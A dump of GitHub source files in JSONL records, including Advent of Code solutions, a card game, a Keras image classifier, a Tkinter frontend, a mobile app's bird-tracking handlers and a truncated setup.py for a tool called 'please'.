print(regs[operand[1]])\n else:\n last_played = int(operand[1])\n print(int(operand[1]))\n elif operand[0] == 'set':\n if operand[2] >= 'a':\n regs[operand[1]] = regs[operand[2]]\n else:\n regs[operand[1]] = int(operand[2])\n elif operand[0] == 'add':\n if operand[2] >= 'a':\n regs[operand[1]] += regs[operand[2]]\n else:\n regs[operand[1]] += int(operand[2])\n elif operand[0] == 'mul':\n if operand[2] >= 'a':\n regs[operand[1]] *= regs[operand[2]]\n else:\n regs[operand[1]] *= int(operand[2])\n elif operand[0] == 'mod':\n if operand[2] >= 'a':\n regs[operand[1]] %= regs[operand[2]]\n else:\n regs[operand[1]] %= int(operand[2])\n elif operand[0] == 'rcv':\n if operand[1] >= 'a':\n if regs[operand[1]] != 0:\n return -9999999999\n else:\n if int(operand[1]) != 0:\n return -9999999999\n elif operand[0] == 'jgz':\n if operand[1] >= 'a':\n if regs[operand[1]] > 0:\n if operand[2] >= 'a':\n offset = regs[operand[2]]\n else:\n offset = int(operand[2])\n else:\n if int(operand[1]) > 0:\n if operand[2] >= 'a':\n offset = regs[operand[2]]\n else:\n offset = int(operand[2])\n return offset\n\npc = 0\n\nlines = open(\"inputfile.txt\", 'r').read().splitlines()\nwhile pc >= 0 and pc <= len(lines):\n pc += parse_instr(lines[pc])\n\nprint(last_played)","repo_name":"roeltrienekens/adventofcode2017","sub_path":"day18/18a.py","file_name":"18a.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23087038622","text":"class TCard():\n def __init__(self):\n self.Suit = 0\n self.Rank = 0\n\nDeck = [None]\nChoice = ''\n\ndef GetRank(RankNo):\n Rank = ''\n if RankNo == 1:\n Rank = 'Ace'\n elif RankNo == 2:\n Rank = 'Two'\n elif RankNo == 3:\n Rank = 'Three'\n elif RankNo == 4:\n Rank = 'Four'\n elif RankNo == 5:\n Rank = 'Five'\n elif RankNo == 6:\n Rank = 'Six'\n elif RankNo == 7:\n Rank = 'Seven'\n elif RankNo == 8:\n Rank = 'Eight'\n elif RankNo == 9:\n Rank = 'Nine'\n elif RankNo == 10:\n Rank = 'Ten'\n elif RankNo == 11:\n Rank = 'Jack'\n elif RankNo == 12:\n Rank = 'Queen'\n elif RankNo == 13:\n Rank = 'King'\n return Rank\n\ndef GetSuit(SuitNo):\n Suit = ''\n if SuitNo == 1:\n Suit = 'Clubs'\n elif SuitNo == 2:\n Suit = 'Diamonds'\n elif SuitNo == 3:\n Suit = 'Hearts'\n elif SuitNo == 4:\n Suit = 'Spades'\n return Suit\n\ndef DisplayCard(ThisCard):\n print()\n print('Card is the', GetRank(ThisCard.Rank), 'of', GetSuit(ThisCard.Suit))\n print()\n\nCount = 0\ndef GetCard(ThisCard, Deck, Count):\n Suit = [1, 3, 2, 4, 1, 2, 1, 1, 1, 3, 3, 3, 3, 3, 2, 3, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 3, 3, 3, 1, 1, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 4, 1, 4, 4]\n Rank = [1, 2, 2, 2, 3, 3, 4, 6, 5, 4, 5, 6, 7, 8, 12, 9, 4, 5, 6, 7, 13, 8, 9, 10, 11, 12, 10, 11, 12, 7, 8, 9, 1, 4, 5, 6, 7, 10, 11, 12, 13, 8, 9, 10, 11, 1, 3, 13, 1, 2, 3, 13]\n ThisCard.Suit = int(Suit[Count])\n ThisCard.Rank = int(Rank[Count])\n Count += 1\n\ndef IsNextCardHigher(LastCard, NextCard):\n Higher = False\n if NextCard.Rank > LastCard.Rank:\n Higher = True\n if (NextCard.Rank == LastCard.Rank) and (NextCard.Suit > LastCard.Suit):\n Higher = True\n return Higher\n\n\ndef GetChoiceFromUser():\n Choice = input('Is it higher than the last one? (enter y or n) Play a Joker? (enter j)')\n return Choice\n\ndef DisplayEndOfGameMessage(Score):\n print()\n print('GAME OVER!')\n print('Your score was', Score)\n if Score == 51:\n print('WOW! You completed a perfect game.')\n print()\n\ndef DisplayCorrectGuessMessage(Score):\n print()\n print('Well done! You guessed correctly.')\n print('Your score is now ', Score, '.', sep='')\n print()\n\n\ndef PlayGame(Deck):\n LastCard = TCard()\n NextCard = TCard()\n GameOver = False\n GetCard(LastCard, Deck, Count)\n DisplayCard(LastCard)\n NoOfCardsTurnedOver = 1\n NoOfJokers = 0\n while (NoOfCardsTurnedOver < 52) and (not GameOver):\n GetCard(NextCard, Deck, NoOfCardsTurnedOver)\n Choice = ''\n while (Choice != 'y') and (Choice != 'n') and (Choice != 'j'):\n Choice = GetChoiceFromUser()\n while (Choice == 'j' and NoOfJokers > 1):\n Choice = GetChoiceFromUser()\n if Choice == 'j':\n NoOfJokers += 1\n DisplayCard(NextCard)\n NoOfCardsTurnedOver = NoOfCardsTurnedOver + 1\n Higher = IsNextCardHigher(LastCard, NextCard)\n if (Higher and Choice == 'y') or (not Higher and Choice == 'n') or (Choice == 'j'):\n DisplayCorrectGuessMessage(NoOfCardsTurnedOver - 1)\n LastCard.Rank = NextCard.Rank\n LastCard.Suit = NextCard.Suit\n else:\n GameOver = True\n if GameOver:\n DisplayEndOfGameMessage(NoOfCardsTurnedOver - 2)\n else:\n DisplayEndOfGameMessage(51)\n\nPlayGame(Deck)","repo_name":"ThomasB123/Python","sub_path":"cardGame.py","file_name":"cardGame.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"35459889920","text":"from PIL import Image\nimport numpy as np\nimport os\nimport glob\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\n\nbatch_size = 20\ninput_shape=(3, 250, 250)\ntrain_datagen = ImageDataGenerator()\n\ntrain_generator = train_datagen.flow_from_directory('data/Training',target_size=(250, 250),batch_size=batch_size,class_mode='sparse') \nvalid_generator = train_datagen.flow_from_directory('data/Validation',target_size=(250, 250),batch_size=batch_size,class_mode='sparse') \n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(3, 250, 250)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3), input_shape=(3, 250, 250)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(1000,activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(5,activation='softmax'))\n\nmodel.compile(optimizer='rmsprop', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\nmodel.fit_generator(train_generator,steps_per_epoch=100 // batch_size,epochs=5,validation_data=valid_generator,validation_steps=800 // batch_size)\nmodel.save('first_try.h5') \n","repo_name":"adarsh071998/Medical-Diagnosis","sub_path":"COM/lib/xray.py","file_name":"xray.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36349462320","text":"# author: Barre kevin\nimport os\nimport json\nimport sys\nimport logging.config\nfrom os import path as opath\nfrom os.path import join as opjoin\nfrom sys import path\nfrom functools import partial\n\ntry:\n import datatools\nexcept ModuleNotFoundError:\n if os.path.exists('datatools.zip'):\n path.insert(0, 'datatools.zip')\n elif os.path.exists('./src/main/python'):\n path.insert(0, './src/main/python')\n\nfrom datatools.melatrics import compose, agregate_files_paths, merge_jsons\n\n# FILESYSTEM = \"HDFS\"\nfile_directory = opath.dirname(opath.abspath(__file__))\nSEARCH_PATHS = [\n opjoin(file_directory, \"raw\"),\n opjoin(file_directory, \"raw\", \"_archive\", \"indexes\")\n]\nFILE_NAME = \"INDEX\"\nOUTPUT_PATH = opjoin(file_directory, \"raw\")\nOUTPUT_NAME = \"OUTPUT.json\"\nLOGGER = opjoin(file_directory, \"logger.conf\")\nlogging.config.fileConfig(fname=LOGGER, disable_existing_loggers=False)\n\nif __name__ == '__main__':\n do_agregate_files_paths = partial(agregate_files_paths, filename=FILE_NAME + \"*\")\n make_agregation = compose(merge_jsons, do_agregate_files_paths)\n agregated = make_agregation(SEARCH_PATHS)\n with open(opjoin(OUTPUT_PATH, OUTPUT_NAME),'w') as outfile:\n json.dump(agregated, outfile)\n outfile.close()\n pass\n","repo_name":"neudinger/JsonAggregation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37427592804","text":"\"\"\"\n Property of CR Capital, LLC. All rights reserved.\n Author: Bill Patterson\n\"\"\"\nimport logging\n\nfrom PIL import ImageTk, Image\n\nimport sys\n\nimport tkinter\nfrom tkinter import messagebox\nfrom tkinter import Label\nfrom tkinter import Frame\nfrom tkinter import IntVar\nfrom tkinter import Radiobutton\nfrom tkinter import Button\nfrom tkinter import Tk\n\n# from com.crcapital.ratingscrawler.ratingscrawler.CRCRatingsPair import CRCRatingsPair\n\n\"\"\"\n Front end constructor that is passed the array of CRCRatingsPairs (ADT to abstract the tickers and statuses).\n Here, it is initialized such that each frame is a module.\n\"\"\"\nclass CRCRatingsFrontend(tkinter.Frame):\n\n \"\"\"\n Aformentioned constructor mentioned in last comment. Seperate thread initialized in CRCRatingsMoodys.\n :param arrayOfPairs: This is the array of CRCRatingPairs, as passed by the thread declaration in\n CRCRatingsMoodys\n \"\"\"\n def __init__(self, arrayOfPairs):\n\n # Array of CRCRatingsPair objects\n self.arrayOfPairs = arrayOfPairs\n\n # Hardcoded width and height (for now)...\n self.width = \"375\"\n self.height = \"500\"\n\n # Root initialization\n self.root = Tk()\n self.root.title(\"Ratings-Trading\")\n self.root.geometry(self.width + \"x\" + self.height)\n self.mainFrame(self.root)\n\n # While true, keep the application visible. Protocal calling on_closing to properly close the window\n # and terminate the thread\n # self.root.protocol(\"WM_DELETE_WINDOW\", self.on_closing())\n self.root.mainloop()\n\n \"\"\"\n This is the main frame, and hence the first window that pops up once the prior threads are terminated.\n This is the last thread in the sequence of threads in CRCRatingsMoodys.\n :param master: Tk() variable\n \"\"\"\n def mainFrame(self, master):\n\n # Main frame\n frame = Frame(master)\n frame.pack()\n\n # CRC logo\n sys.path.append('../../../../images/CRC_Logo.png')\n img = ImageTk.PhotoImage(Image.open(\"../../../../images/CRC_Logo.png\"))\n # TODO: Fix icon\n # master.iconbitmap(\"../../../../images/CRC_Logo.ico\")\n img_panel = Label(master, image=img)\n img_panel.image = img\n img_panel.pack()\n\n banner = Label(master, text='Welcome to the Ratings Trader', font=('Helvetica', 24))\n banner.pack(side=\"bottom\", fill=\"both\", expand=\"yes\")\n\n choose_brokerage_label = Label(master,text='Choose your brokerage:')\n choose_brokerage_label.pack()\n\n # Engineered in such a way that one can add more brokerages (in the form of radio buttons) if\n # further functionality is sought. For now, this is more of a proof of concept than a product,\n # so for those reasons, interfacing with other brokerage APIs is not a priority.\n\n # Tkinter variable to determine callback values\n self.selection = IntVar()\n\n no_selection = Radiobutton(master, text='[None]', variable=self.selection, value = 0,\n command=self.selection_callback)\n no_selection.pack()\n IB_selection = Radiobutton(master, text='Interactive Brokers', variable=self.selection,\n value=1, command=self.selection_callback)\n IB_selection.pack()\n\n more = Label(master, text='More brokerages to come...')\n more.pack()\n\n next = Button(master, text='Next')\n next.pack()\n\n \"\"\"\n This is the callback initiated when a RadioButton is selected\n 0 - [None]\n 1 - [Interactive Brokers]\n ...\n (More brokerages may be added in the future)\n \"\"\"\n def selection_callback(self):\n logging.debug(str(self.selection.get()))\n\n \"\"\"\n This is the on_closing protocol that will properly destroy the application, such that the main thread in\n the spider can resume.\n \"\"\"\n def on_closing(self):\n if messagebox.askokcancel(\"Quit\", \"Are you sure you want to quit?\"):\n self.root.destroy()","repo_name":"dmmagdal/Ratings-Trading","sub_path":"ratingstrading.src/com/crcapital/frontend/CRCRatingsFrontend.py","file_name":"CRCRatingsFrontend.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38541650758","text":"import turtle, math, random\nfrom space_arena import *\n\nclass Radar():\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\n def render(self, pen, sprites):\n\n # Draw radar circle\n pen.color(\"white\")\n pen.setheading(90)\n pen.goto(self.x + self.width / 2.0, self.y)\n pen.pendown()\n pen.circle(self.width / 2.0)\n pen.penup()\n\n # Draw sprites\n for sprite in sprites:\n if sprite.state == \"active\":\n radar_x = self.x + (sprite.x - player.x) * (self.width/game.width)\n radar_y = self.y + (sprite.y - player.y) * (self.height/game.height)\n pen.goto(radar_x, radar_y)\n pen.color(sprite.color)\n pen.shape(sprite.shape)\n pen.setheading(sprite.heading)\n pen.shapesize(0.1, 0.1, None)\n\n # Make sure the sprite is close to the player\n distance = ((player.x-sprite.x)**2 + (player.y-sprite.y)**2)**0.5\n if distance < player.radar:\n pen.stamp()","repo_name":"aviparkhe/space_arena","sub_path":"radar.py","file_name":"radar.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7719356457","text":"import itertools\n\nadapters = []\nwith open('adapters.txt') as file:\n for line in file:\n adapters.append(int(line.split('\\n')[0]))\n\n# Add 0 to the list\nadapters.append(0)\n# Sort list\nadapters.sort()\n# Add last number (highest since the list is sorted) +3\nadapters.append(adapters[-1] + 3)\nprint(adapters)\n\n\n# Go through the list recording differeces in sorted list\nremovables = []\nfor k in range(1, len(adapters)-1):\n diff = adapters[k + 1] - adapters[k - 1]\n if diff <= 3:\n removables.append(adapters[k])\n\n\n\n\ntotal = 1\ncount = 1\nprint(removables)\nremovables.append(removables[-1]+4)\nfor l in range(len(removables)-1):\n if removables[l+1] - removables[l] <= 3:\n # print(removables[l+1])\n count = count + 1\n else:\n if count == 3:\n total = total * 7\n if count <= 2:\n total = total * 2**count\n\n count = 1\n\n\nprint(total)","repo_name":"slevin87/AdventOfCode","sub_path":"2020/Day_10/day10_b.py","file_name":"day10_b.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"185772047","text":"import json\nimport os\nfrom ru.travelfood.simple_ui import NoSQL as noClass\nfrom PIL import Image\nimport datetime\n\nqueue_birds = []\n\n\ndef init(hashMap, _files=None, _data=None):\n SW_Birds = noClass(\"birds_nosql\")\n finish_log = noClass(\"birds_log\")\n return hashMap\n\n\ndef birds_on_start(hashMap, _files=None, _data=None):\n SW_Birds = noClass(\"birds_nosql\")\n hashMap.put(\"mm_local\", \"\")\n hashMap.put(\"mm_compression\", \"70\")\n hashMap.put(\"mm_size\", \"65\")\n\n list = {\"customcards\": {\n\n \"layout\": {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"match_parent\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n 'key': '@id_number',\n \"type\": \"LinearLayout\",\n \"orientation\": \"horizontal\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n\n \"type\": \"Picture\",\n \"show_by_condition\": \"\",\n \"Value\": \"@pic\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\",\n \"TextSize\": \"16\",\n \"TextColor\": \"#DB7093\",\n \"TextBold\": True,\n \"TextItalic\": False,\n \"BackgroundColor\": \"\",\n \"width\": \"75\",\n \"height\": \"75\",\n \"weight\": 0\n },\n {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"1\",\n \"Elements\": [\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@id_number\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@name\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@color\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n }\n ]\n }\n ]\n }\n ]\n }\n\n }\n }\n\n query = SW_Birds.getallkeys()\n jkeys = json.loads(query)\n list[\"customcards\"][\"cardsdata\"] = []\n # Чек списка\n # list[\"customcards\"][\"cardsdata\"].append({\"id_number\": query})\n for i in jkeys:\n a = json.loads(SW_Birds.get(i))\n\n pic = \"\"\n if 'photo' in a:\n p = a['photo']\n if len(p) > 0:\n for jf in _files:\n if jf['id'] == p[0]:\n if os.path.exists(jf['path']):\n pic = \"~\" + jf['path']\n break\n list[\"customcards\"][\"cardsdata\"].append(\n {\"key\": a[\"id\"], \"id_number\": a['id'], 'color': a['color'], 'name': a['name'], 'pic': pic})\n # Тесты птиц\n # for n in range(10):\n # list[\"customcards\"][\"cardsdata\"].append(\n # {\"name\": \"Тестовая птица \" + str(n), \"key\": n, \"id_number_number\": str(n), \"color\": str(n), \"pictures\": [],\n # \"pic\": \"\"})\n\n hashMap.put(\"list\", json.dumps(list))\n\n return hashMap\n\n\ndef birds_input(hashMap, _files=None, _data=None):\n global nom_id\n\n if hashMap.get(\"listener\") == \"btn_add\":\n hashMap.put(\"name\", \"\")\n hashMap.put(\"color\", \"\")\n\n hashMap.put(\"photoGallery\", json.dumps([]))\n\n nom_id = -1\n hashMap.put(\"ShowScreen\", \"Добавление\")\n elif hashMap.get('listener') == 'CardsClick':\n hashMap = open_nom(hashMap, hashMap.get(\"selected_card_key\"))\n\n return hashMap\n\n\ndef birds_record_input(hashMap, _files=None, _data=None):\n global nom_id\n if hashMap.get(\"listener\") == \"btn_save\":\n\n hashMap, success = save_nom(hashMap)\n if success:\n hashMap.put(\"ShowScreen\", \"Птицы\")\n\n elif hashMap.get(\"listener\") == \"photo\":\n\n image_file = str(\n hashMap.get(\"photo_path\"))\n\n image = Image.open(image_file)\n im = image.resize((500, 500))\n im.save(image_file)\n\n jphotoarr = json.loads(hashMap.get(\"photoGallery\"))\n hashMap.put(\"photoGallery\", json.dumps(jphotoarr))\n nom_id = 1\n\n\n elif hashMap.get(\n \"listener\") == \"gallery_change\":\n if hashMap.containsKey(\"photoGallery\"):\n jphotoarr = json.loads(hashMap.get(\"photoGallery\"))\n hashMap.put(\"photoGallery\", json.dumps(jphotoarr))\n\n return hashMap\n\n\ndef birds_record_on_start(hashMap, _files=None, _data=None):\n hashMap.put(\"mm_local\", \"\")\n hashMap.put(\"mm_compression\", \"70\")\n hashMap.put(\"mm_size\", \"65\")\n\n hashMap.put(\"fill_name\", json.dumps({\"hint\": \"Название птицы\", \"default_text\": hashMap.get(\"name\")}))\n hashMap.put(\"fill_color\", json.dumps({\"hint\": \"Цвет птицы\", \"default_text\": hashMap.get(\"color\")}))\n\n return hashMap\n\n\ndef card_input(hashMap, _files=None, _data=None):\n global info\n global queue_birds\n SW_Birds = noClass(\"birds_nosql\")\n if hashMap.get('listener') == 'btn_add_score':\n info['counter'] = str(int(info['counter']) + 1)\n SW_Birds.put('Object' + info['id'], json.dumps(info, ensure_ascii=False), True)\n\n hashMap.put('toast', json.dumps(queue_birds))\n if not 'Object' + info['id'] in queue_birds:\n queue_birds.append('Object' + info['id'])\n\n return hashMap\n\n\ndef card_on_start(hashMap, _files=None, _data=None):\n global info\n hashMap.put(\"mm_local\", \"\")\n hashMap.put(\"mm_compression\", \"70\")\n hashMap.put(\"mm_size\", \"65\")\n list2 = {\"customcards\": {\n\n \"layout\": {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"match_parent\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n 'key': '@id_number',\n \"type\": \"LinearLayout\",\n \"orientation\": \"horizontal\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n\n \"type\": \"Picture\",\n \"show_by_condition\": \"\",\n \"Value\": \"@pic\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\",\n \"TextSize\": \"25\",\n \"TextColor\": \"#DB7093\",\n \"TextBold\": True,\n \"TextItalic\": False,\n \"BackgroundColor\": \"\",\n \"width\": \"150\",\n \"height\": \"150\",\n \"weight\": 0\n },\n {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"1\",\n \"Elements\": [\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": '@id_number',\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@name\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@color\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n }\n ]\n }\n ]\n }\n ]\n }\n\n }\n }\n list2[\"customcards\"][\"cardsdata\"] = []\n pic = \"\"\n if 'photo' in info:\n p = info['photo']\n if len(p) > 0:\n for jf in _files:\n if jf['id'] == p[0]:\n if os.path.exists(jf['path']):\n pic = \"~\" + jf['path']\n break\n list2[\"customcards\"][\"cardsdata\"].append(\n {\"key\": info[\"id\"], \"id_number\": info['id'], 'color': info['color'], 'name': info['name'], 'pic': pic})\n hashMap.put(\"list2\", json.dumps(list2))\n\n return hashMap\n\n\ndef open_nom(hashMap, key):\n global info\n SW_Birds = noClass(\"birds_nosql\")\n jsinfo = json.loads(SW_Birds.get('Object' + key))\n info = jsinfo\n hashMap.put(\"ShowScreen\", \"Карточка птицы\")\n hashMap.put('toast', json.dumps(info))\n return hashMap\n\n\ndef get_if_exist(hashMap, field):\n if hashMap.containsKey(field):\n res = hashMap.get(field)\n else:\n res = \"\"\n return res\n\n\ndef save_nom(hashMap):\n SW_Birds = noClass(\"birds_nosql\")\n global nom_id\n if not hashMap.containsKey(\"name\"):\n hashMap.put(\"toast\", \"Не указано наименование\")\n return hashMap, False\n else:\n if len(hashMap.get(\"name\")) == 0:\n hashMap.put(\"toast\", \"Не указано наименование\")\n return hashMap, False\n if not hashMap.containsKey(\"color\"):\n hashMap.put(\"toast\", \"Не указан цвет\")\n return hashMap, False\n else:\n if len(hashMap.get(\"color\")) == 0:\n hashMap.put(\"toast\", \"Не указан цвет\")\n return hashMap, False\n jkeys = json.loads(SW_Birds.getallkeys())\n if len(jkeys) == 0:\n id = '0'\n else:\n id_mn = json.loads(SW_Birds.get(jkeys[-1]))['id']\n id = str(int(id_mn) + 1)\n if nom_id < 0:\n d = {'id': id, 'name': get_if_exist(hashMap, \"name\"), 'color': get_if_exist(hashMap, \"color\"), 'counter': '0'}\n SW_Birds.put('Object' + id, json.dumps(d, ensure_ascii=False), True)\n else:\n d = {'id': id, 'name': get_if_exist(hashMap, \"name\"), 'color': get_if_exist(hashMap, \"color\"),\n 'photo': json.loads(hashMap.get(\"photoGallery\")), 'counter': '0'}\n SW_Birds.put('Object' + id, json.dumps(d, ensure_ascii=False), True)\n\n return hashMap, True\n\n\ndef finish_on_start(hashMap, _files=None, _data=None):\n finish_log = noClass(\"birds_log\")\n hashMap.put(\"mm_local\", \"\")\n hashMap.put(\"mm_compression\", \"70\")\n hashMap.put(\"mm_size\", \"65\")\n\n list3 = {\"customcards\": {\n\n \"layout\": {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"match_parent\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n 'key': '@id_number',\n \"type\": \"LinearLayout\",\n \"orientation\": \"horizontal\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"0\",\n \"Elements\": [\n {\n\n \"type\": \"Picture\",\n \"show_by_condition\": \"\",\n \"Value\": \"@pic\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\",\n \"TextSize\": \"16\",\n \"TextColor\": \"#DB7093\",\n \"TextBold\": True,\n \"TextItalic\": False,\n \"BackgroundColor\": \"\",\n \"width\": \"125\",\n \"height\": \"125\",\n \"weight\": 0\n },\n {\n \"type\": \"LinearLayout\",\n \"orientation\": \"vertical\",\n \"height\": \"wrap_content\",\n \"width\": \"match_parent\",\n \"weight\": \"1\",\n \"Elements\": [\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@id_number\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@date\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@counter\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@name\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n },\n {\n \"type\": \"TextView\",\n \"show_by_condition\": \"\",\n \"Value\": \"@color\",\n \"NoRefresh\": False,\n \"document_type\": \"\",\n \"mask\": \"\",\n \"Variable\": \"\"\n }\n ]\n }\n ]\n }\n ]\n }\n\n }\n }\n query = finish_log.getallkeys()\n jkeys = json.loads(query)\n list3[\"customcards\"][\"cardsdata\"] = []\n for i in jkeys[::-1]:\n a = json.loads(finish_log.get(i))\n hashMap.put('toast', finish_log.get(i))\n pic = \"\"\n if 'photo' in a:\n p = a['photo']\n if len(p) > 0:\n for jf in _files:\n if jf['id'] == p[0]:\n if os.path.exists(jf['path']):\n pic = \"~\" + jf['path']\n break\n list3[\"customcards\"][\"cardsdata\"].append(\n {\"date\": i, \"id_number\": a['id'], 'color': a['color'], 'name': a['name'], 'pic': pic,\n 'counter': a['counter']})\n\n hashMap.put(\"list3\", json.dumps(list3))\n\n return hashMap\n\n\ndef finish_input(hashMap, _files=None, _data=None):\n global queue_birds\n SW_Birds = noClass(\"birds_nosql\")\n finish_log = noClass(\"birds_log\")\n if hashMap.get(\"listener\") == \"btn_plus\":\n for i in queue_birds:\n inf = json.loads(SW_Birds.get(i))\n if 'photo' in inf:\n d = {'id': inf['id'], 'name': inf['name'], 'color': inf['color'],\n 'counter': inf['counter'],\n 'photo': inf['photo']}\n finish_log.put(str(datetime.datetime.now()), json.dumps(d, ensure_ascii=False), True)\n else:\n d = {'id': inf['id'], 'name': inf['name'], 'color': inf['color'], 'counter': inf['counter']}\n finish_log.put(str(datetime.datetime.now()), json.dumps(d, ensure_ascii=False), True)\n else:\n queue_birds = []\n hashMap.put('toast', finish_log.getallkeys())\n return hashMap\n","repo_name":"LightLM/SimpleUI_test","sub_path":"1/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":18493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14442123843","text":"# -*- coding: utf8 -*-\n\nimport sys\nfrom distutils import log as log\nfrom distutils.core import Command\nimport os\n\n\nimport please\nimport please.utils\nfrom please.executors.compiler import compile\nfrom please.utils.form_error_output import form_err_string_by_std\nfrom please.utils.exceptions import PleaseException\nimport please.log\n\npath = os.path.join(os.path.dirname(please.__file__), 'checkers')\nfor file in os.listdir(path):\n res,fout, err = None, None, None\n if os.path.splitext(file)[1] == '.cpp':\n res, fout, err = compile(os.path.join(path, file))\n if res.verdict != 'OK':\n print(form_err_string_by_std(fout, err))\n\nimport distribute_setup\n# Ставим дистрибьют правильной версии\n# Installation of the up to date distribution\n# distribute_setup.use_setuptools(version=\"0.6.19\")\n\nfrom setuptools import setup, find_packages\n\n# Папки, не содержащие код\n# Folders without\npackage_data = {\n 'please': ['templates/*.*', 'checkers/*.*'],\n 'please.exporter': ['templates/*.*'],\n 'please.language': ['mime.types'],\n}\n\n\nentry_points = {\n 'console_scripts' : ['please = please.launcher:main']\n}\n\n# python-библиотеки, обязательные к установке.\n# python-modules obligatory for installation\n# Можно указывать версию. Больше информации можно найти здесь:\n# You can specify the current version. For more information:\n# http://packages.python.org/distribute/setuptools.html#id12\n# Если инсталлятор не находит правильной версии библиотеки, то\n# нужно прописать в dependency_links либо прямую ссылку на дистрибутив, либо\n# ссылку на страницу, где перечислены варианты дистрибутивов этой библиотеки\n# со ссылками - он сам повыдёргивает, откуда скачать.\ninstall_requires = [\n 'psutil ==2.0.0',\n 'colorama',\n 'HTML.py ==0.04',\n]\n\nrepository_url = 'https://raw.githubusercontent.com/dubov94/please/master/'\n\ndependency_links = 